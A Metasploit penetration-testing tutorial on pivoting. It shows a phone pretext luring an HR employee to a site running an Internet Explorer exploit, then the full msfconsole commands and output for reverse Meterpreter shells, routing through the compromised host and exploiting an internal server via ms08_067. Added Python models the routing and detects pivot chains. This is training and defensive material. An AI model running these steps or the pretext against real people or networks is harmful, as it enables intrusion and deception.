Pivoting
Pivoting is the technique of using a compromised instance (also referred to as a 'plant' or 'foothold') to "move" around inside a network: the first compromise is used to reach, and to aid in compromising, other systems that would otherwise be inaccessible. In this scenario we use it to route traffic into a normally non-routable network.

For example, we are a pentester for Security-R-Us. You pull the company directory and find poor Mary Jo Swanson in Human Resources on Sneaks.IN's main website. You call up Mary Swanson, claim you are from the information technology group, and tell her she needs to visit a website to patch her computer against "suspicious traffic". She visits your site, which happens to be running the latest Internet Explorer vulnerability.
msf > use windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  /                no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
msf exploit(ms09_002_memory_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms09_002_memory_corruption) > set URIPATH /
URIPATH => /
msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms09_002_memory_corruption) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  /                no        The URI to use for this exploit (default is random)

Payload options (windows/patchupmeterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
msf exploit(ms09_002_memory_corruption) > set LHOST 10.10.1.109
LHOST => 10.10.1.109
msf exploit(ms09_002_memory_corruption) > set LPORT 8080
LPORT => 8080
msf exploit(ms09_002_memory_corruption) > exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.10.10.243:80/
[*] Server started.

Our social engineering attack has been successful! Poor Mary Swanson has connected to our website and has unknowingly given us full access to her computer.
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.10.1.109:80/
[*] Server started.
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 10.10.1.104:62238...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.10.1.109:8080 -> 10.10.1.104:62239)
msf exploit(ms09_002_memory_corruption) > sessions -l
Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.10.1.109:8080 -> 10.10.1.104:62239

msf exploit(ms09_002_memory_corruption) >

The question from here is, where do we go next?
We have to somehow gain further access and dive deeper into the network. Notice that we used a REVERSE Meterpreter payload, and that the attacking machine's IP address is in a different subnet from the victim's machine: the victim's IP address is 10.211.55.140 and our attacking IP is 10.10.1.109. How can we launch attacks against other systems on that network? If we want to go after another host at 10.211.55.128, we need to pivot our attacks through the compromised machine and exploit the system from there. Let's do it.
We begin by interacting with the Meterpreter session and making note of our IP address versus the victim's. We issue the 'route' command to view the subnets available on the victim PC.
msf exploit(ms09_002_memory_corruption) > sessions -l
Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.10.1.109:8080 -> 10.10.1.104:62239
msf exploit(ms09_002_memory_corruption) > ifconfig
[*] exec: ifconfig
eth0 Link encap:Ethernet HWaddr 00:0d:29:d9:ec:cc
inet addr:10.10.1.109 Bcast:10.10.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee8:ebe7/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:14826 errors:12824 dropped:0 overruns:0 frame:0
TX packets:6634 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:7542708 (7.5 MB) TX bytes:2385453 (2.3 MB)
Interrupt:19 Base address:0x2024
msf exploit(ms09_002_memory_corruption) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > route
Network routes
==============

    Subnet           Netmask          Gateway
    ------           -------          -------
    0.0.0.0          0.0.0.0          10.211.55.2
    10.211.55.0      255.255.255.0    10.211.55.140
    10.211.55.140    255.255.255.255  127.0.0.1
    10.255.255.255   255.255.255.255  10.211.55.140
    127.0.0.0        255.0.0.0        127.0.0.1
    224.0.0.0        240.0.0.0        10.211.55.140
    255.255.255.255  255.255.255.255  10.211.55.140

meterpreter >
Background session 1? [y/N] y

With this valuable information in hand, we add the new route to Metasploit using the subnet and subnet mask of the victim, pointing it at the Meterpreter session number, which is '1' in this case. Running the 'route print' command then displays the routes available to us.
msf exploit(ms09_002_memory_corruption) > route add 10.211.55.0 255.255.255.0 1
msf exploit(ms09_002_memory_corruption) > route print
Active Routing Table
====================

   Subnet         Netmask          Gateway
   ------         -------          -------
   10.211.55.0    255.255.255.0    Session 1

msf exploit(ms09_002_memory_corruption) >

We will now use our newly created route to exploit a system further inside the victim network.
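As an added illustration (not code from the original page or from the Metasploit project), the following Python models the two steps just taken by hand: it parses a Meterpreter 'route' listing into the subnets worth adding a route for, and it implements a small table in the spirit of 'route add <subnet> <netmask> <session>' that resolves a destination address to the session whose tunnel will carry the traffic. The route text is constructed to mirror the listing above; PivotRouteTable, build_table_from_session and the other names are my own and not Framework APIs.

```python
import ipaddress

# Constructed sample (not captured from the page): the route table that a
# Meterpreter session reports on the first compromised host, mirroring the
# 'route' listing in the walkthrough.
METERPRETER_ROUTE_OUTPUT = """\
Subnet           Netmask          Gateway
------           -------          -------
0.0.0.0          0.0.0.0          10.211.55.2
10.211.55.0      255.255.255.0    10.211.55.140
10.211.55.140    255.255.255.255  127.0.0.1
10.255.255.255   255.255.255.255  10.211.55.140
127.0.0.0        255.0.0.0        127.0.0.1
224.0.0.0        240.0.0.0        10.211.55.140
255.255.255.255  255.255.255.255  10.211.55.140
"""


def parse_route_table(text):
    """Return (subnet, netmask, gateway) string triples from a 'route' listing,
    skipping header and separator lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        try:
            for p in parts:
                ipaddress.IPv4Address(p)  # validate every column as an address
        except ipaddress.AddressValueError:
            continue  # 'Subnet Netmask Gateway' header and '------' rows
        entries.append(tuple(parts))
    return entries


def candidate_pivot_subnets(entries):
    """Keep only routes that describe reachable networks: the default route,
    host routes (/32), loopback and multicast ranges carry no pivot value."""
    nets = []
    for subnet, netmask, _gateway in entries:
        net = ipaddress.IPv4Network((subnet, netmask), strict=False)
        if net.prefixlen in (0, 32) or net.is_loopback or net.is_multicast:
            continue
        nets.append(net)
    return nets


class PivotRouteTable:
    """Hypothetical model of 'route add <subnet> <netmask> <session>': a
    destination is sent through the session owning the most specific
    matching route; an unmatched destination is reached directly (None)."""

    def __init__(self):
        self.routes = []  # list of (IPv4Network, session_id)

    def add(self, subnet, netmask, session_id):
        net = ipaddress.IPv4Network((subnet, netmask), strict=False)
        self.routes.append((net, session_id))

    def lookup(self, dst):
        addr = ipaddress.IPv4Address(dst)
        best = None
        for net, session_id in self.routes:
            if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
                best = (net, session_id)
        return None if best is None else best[1]

    def print_routes(self):
        """Print the table in the layout of 'route print'."""
        print("Subnet           Netmask          Gateway")
        for net, session_id in self.routes:
            print(f"{str(net.network_address):<16} {str(net.netmask):<16} Session {session_id}")


def build_table_from_session(route_text, session_id):
    """Parse a session's route listing and register every candidate subnet
    against that session, as the walkthrough does by hand for session 1."""
    table = PivotRouteTable()
    for net in candidate_pivot_subnets(parse_route_table(route_text)):
        table.add(str(net.network_address), str(net.netmask), session_id)
    return table


if __name__ == "__main__":
    table = build_table_from_session(METERPRETER_ROUTE_OUTPUT, 1)
    table.print_routes()
    for dst in ("10.211.55.128", "10.10.1.104"):
        print(dst, "->", table.lookup(dst))
```

Run stand-alone it prints the single 10.211.55.0/24 route and shows that 10.211.55.128 resolves to session 1 while 10.10.1.104, being directly reachable, resolves to no session. The longest-prefix rule in lookup is what lets a later, more specific route (for instance a /32 through a second session) take precedence without removing the broader one.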
msf exploit(ms09_002_memory_corruption) > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
PAYLOAD => windows/patchupmeterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/patchupmeterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.211.55.128
RHOST => 10.211.55.128
msf exploit(ms08_067_netapi) > set LPORT 9000
LPORT => 9000
msf exploit(ms08_067_netapi) > set LHOST 10.10.1.109
LHOST => 10.10.1.109
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 Service Pack 2 - lang:English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (205835 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (10.10.1.109:9000 -> 10.10.1.104:62260)
meterpreter >
Background session 2? [y/N] y

It certainly appears that we successfully pivoted into the network. Let's confirm that we are where we want to be.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.10.1.109:8080 -> 10.10.1.104:62239
  2   Meterpreter  10.10.1.109:9000 -> 10.10.1.104:62260
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > execute -f cmd.exe -i
Process 3864 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 6:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 10.211.55.128
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.211.55.2
C:\WINDOWS\system32>

Success! We have routed our exploit to the 10.211.55.0/24 network and compromised hosts inside the normally non-routable network!
We now have full access to both 10.211.55.140 and 10.211.55.128. Both session tunnels show 10.10.1.109 connected to 10.10.1.104 because we used a reverse payload and 10.10.1.104 is the external IP address: 10.211.55.128 and 10.211.55.140 are NATed behind the router at 10.10.1.104.
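Seen from the defended side of that NAT, the walkthrough leaves a recognisable pattern in internal flow records: a workstation opens an outbound connection to an outside address, then talks SMB to an internal server, and that server then opens its own outbound connection to the same outside address. The following Python is an added detection example, not part of the original page; it assumes flow records captured inside 10.211.55.0/24, where the internal addresses are visible (the handler outside only ever sees 10.10.1.104), and the sample flows, Flow record layout and find_pivot_chains function are constructed for this illustration.

```python
import ipaddress
from collections import namedtuple

# One connection record: start time in seconds, source/destination address and port.
Flow = namedtuple("Flow", "ts src sport dst dport")

# Constructed flow records (not captured data) following the walkthrough's
# two Meterpreter sessions, plus unrelated traffic that must not be flagged.
SAMPLE_FLOWS = [
    Flow(100, "10.211.55.140", 62239, "10.10.1.109", 8080),  # HR workstation calls back (session 1)
    Flow(160, "10.211.55.140", 1042, "10.211.55.128", 445),  # workstation -> server SMB, routed via session 1
    Flow(161, "10.211.55.128", 62260, "10.10.1.109", 9000),  # server calls back to the same address (session 2)
    Flow(200, "10.211.55.131", 1055, "10.211.55.128", 445),  # ordinary file-share use
    Flow(220, "10.211.55.131", 1060, "10.10.1.200", 443),    # ordinary web browsing
]

INTERNAL_NET = ipaddress.IPv4Network("10.211.55.0/24")  # the NATed network under watch


def is_internal(ip):
    return ipaddress.IPv4Address(ip) in INTERNAL_NET


def find_pivot_chains(flows, window=300):
    """Return sorted (workstation, server, external) triples where, within
    `window` seconds of each hop: workstation -> external E, then
    workstation -> internal server, then server -> the same E.
    Requiring the *same* external address on both ends is what separates
    this chain from ordinary browsing followed by ordinary file-share use."""
    flows = sorted(flows, key=lambda f: f.ts)
    chains = set()
    for first in flows:
        if not is_internal(first.src) or is_internal(first.dst):
            continue  # the first hop must leave the network
        a, external = first.src, first.dst
        for lateral in flows:
            if lateral.src != a or lateral.dst == a or not is_internal(lateral.dst):
                continue
            if not first.ts <= lateral.ts <= first.ts + window:
                continue
            b = lateral.dst
            for callback in flows:
                if (callback.src == b and callback.dst == external
                        and lateral.ts <= callback.ts <= lateral.ts + window):
                    chains.add((a, b, external))
    return sorted(chains)


if __name__ == "__main__":
    for a, b, e in find_pivot_chains(SAMPLE_FLOWS):
        print(f"possible pivot: {a} reached {b} after both connected out to {e}")
```

On the constructed records this reports exactly one chain, 10.211.55.140 to 10.211.55.128 via 10.10.1.109; the unrelated SMB and web flows from 10.211.55.131 are left alone because no internal server ever calls back to the address that workstation talked to. A server initiating its own outbound connection is the strongest part of the signal and is worth alerting on even without the full chain.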
© Offensive Security 2009

